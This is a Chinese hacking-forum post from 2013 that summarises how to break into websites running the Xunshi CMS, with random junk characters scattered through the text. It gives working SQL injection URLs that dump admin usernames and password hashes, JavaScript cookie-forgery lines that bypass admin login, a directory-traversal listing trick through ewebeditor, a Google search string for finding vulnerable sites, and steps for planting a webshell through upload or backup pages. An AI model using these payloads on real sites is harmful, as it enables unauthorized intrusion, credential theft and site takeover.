中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘
3 q. `& @. r: ?& s4 F+ t
5 K3 E( F% Y2 J* o9 J$ E) G0 Y" G& N7 i在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
' i3 e8 x: i' B. u2 @& y9 ?) T: t6 {9 L8 y9 I
以下本文总结来自黑防去年第9期杂志上的内容...
" D& i) l- J( m! Q; \9 U: C& ]' o- ~# G# e- Q( U* i# u+ O
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
! v/ {2 h8 T: @* v0 d6 c+ `! B( Q) z
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& B8 o7 O' \$ L, ~9 f5 l. G
, {! t. D) I7 R0 e/ \) y记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
5 x7 [# d0 L9 e) T7 U/ N这里一个注入
" h3 p' o) f6 s# v) Q& y( V3 c& s# n9 H' M8 i! j
效果如图:9 r5 u8 H: M3 P+ H/ b" H  `4 t* c) [
& A/ h+ ?. ^( i3 w7 j

$ i$ M  T# ?. Z) ]( f- j, p/ |4 C* S  i
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.0 n' {5 f: N, F9 T
/ n7 B1 X2 E# j7 X1 E, Z* v) j
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( o3 f. d9 a" k4 d  n8 n( w5 {( l1 y6 K! |* O- _
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
% _' F. h) ]# c# ~9 |9 o: Z2 T8 n& Y! F* m
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
- ?* V( @9 [$ T* a- s( g4 m& U1 n9 v' F% z
6 l) ~8 o) _- `! w1 q5 P3 g, ~因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞3 @/ x% D+ [" ^5 g" W/ m

1 p3 q% ]% }' Q0 {7 K3 c它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以/ G- n8 C0 K1 N, r# ?3 A
2 u+ Y2 V; v# ]( J+ d
访问这页面来列目录..步骤如下:
7 P" J& Q7 j9 i1 M2 A" D9 l/ E9 n! B+ F/ O$ P
javascript:alert(document.cookie="admindj=1") + H' @  N( }# C# a0 B
5 t( n) w0 Z6 }
http://www.political-security.co ... asp?id=46&dir=../..1 c% V$ G+ E( D$ x+ c# g# y- ~
/ Y" h! `* t: \1 r, O3 {2 h1 |3 X
效果如图:
) l, f2 P- J* [: [; y. T$ f- K
* v& g, g' V5 S  [ + [# |2 J3 C7 h  m  ~6 [

; c" i7 g2 D2 ~" m0 v% m9 F" |这样全站目录都能瞧了..找到后台目录..进去..) }: w; ?0 ?2 @( {% A( N/ Y

8 M! d5 l; h4 {! H: F那么进了后台怎么拿shell??上传--备份就ok了.., c& B: m- t4 J" q7 L

" b* \, q) c3 K: `* n  I6 b( o那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..3 u% b1 Z0 N' l7 O

$ f% e( c) v; B- j  J9 R, u这个我也碰到过一次..你都可以通过列目录来实现..
- ]5 y, K1 N, V9 b5 F
+ ^7 z2 |' C" {; d/ zjavascript:alert(document.cookie="admindj=1") + ]' h& {- }. d' r1 C6 w- Q

6 R1 Y/ L+ ^7 b5 M2 A8 Q  ?. d. zhttp://www.political-security.co ... p?action=BackupData
% l$ N3 R$ L5 C2 |2 ~  K) X2 k, G
备份ok.." I+ P1 I& b0 m2 V  A! s% f0 U$ \0 g6 \
8 U! V: t' R8 O
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?* s- _2 }8 F! G8 y) }
; @- t2 g6 P/ J% {. d# }8 e% ^
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下+ |2 e) @9 n/ f# N/ O3 d
3 ?) P& w. |; |# `
然后访问此页面进行注入..步骤如下:. l0 ]& t* J7 b6 B7 L1 H' u

7 v- H. h; o0 \+ X8 _javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
7 Z8 \0 {' P+ v' R
1 g9 P1 J2 j$ S, I: P然后请求admin/admin_chk.asp页面
; Y, ?8 `9 O+ G- X2 b; i/ F( _* Y9 v' }: H, h, R) ^/ y
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
" d4 K/ H0 r3 B' ^6 r
7 v1 E% V" W; O1 E* j26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin. n& A. [% R& I: Q2 P9 d) ~5 `" G0 I! N

. S, }6 l5 v3 V效果如图所示:
+ x% x' C# @% D2 Y( b: f% w$ ]+ k( M) |
/ o+ x* |+ o/ w8 K* r; Q

' L, c  o: E: b讯时漏洞29 V  Q( k1 g: N! `7 N5 e0 @; i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
- r; a; w4 w# {  Y5 W5 i4 v+ [+ n! w 8 K0 \. n3 B' }' p2 c9 d  i  N( y
1、/admin/admin_news_pl_view.asp?id=1
8 v$ Z  g; W! }, v//id任意 填入以下语句
+ O' x2 q' ~0 }" ?% K ; A  V  ~: m- M; Q9 }
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 J0 D) u* d  |) E0 Q
# n0 S# Z" v2 Y! }/ g& `& J6 P7 b; w5 j4 [% H
$ l6 Q. {2 K7 r' s& y7 J9 s
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='' P* ?3 c+ Q9 l- P1 s

" l, L2 }, a: c6 j9 R* G3 I, f, W: [
/ q' v5 Z2 @2 _
爆出管理员帐号和密码了
; R* Y+ [( e1 _7 W- N7 f, L: W3 h + Z. s5 m9 r+ C2 v4 w$ J+ K3 h) F8 k
( G! s: V5 l9 M

9 W) f" a0 J7 Z' B4、cookies进后台
2 {! L6 I8 `) Z1 ?8 z/ @3 b " |6 [( T) T4 V. H6 O
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
8 a: Q  ^2 ~+ p' F   T6 Q+ V8 |9 @0 K$ S( |
( T! n5 a# ~; A

1 C; j# z* Q$ @0 U1 K5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!% `" t( S, x. y: ?7 C1 U. f

' t" d& C5 Z7 {* P! o6 E5 ?% v. ~  v8 H" [
+ }- U( L) k! R, |" Y" m8 r
6、后台有上传和备份取SHELL不难。
) B3 G/ T) e  P& T# b( |4 N! p- R. L 7 o* m0 p) h  t' @" s
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..0 ?* C, h' }; t0 O1 i: q

) B1 D6 d6 m; U# u逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
. Y+ d8 [( _; ?, S* {& V' z  j' |9 b, G8 J7 c* d( b! r) R  P0 b

2 u$ C: h0 V: x; f
  i! @& \% z# [




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2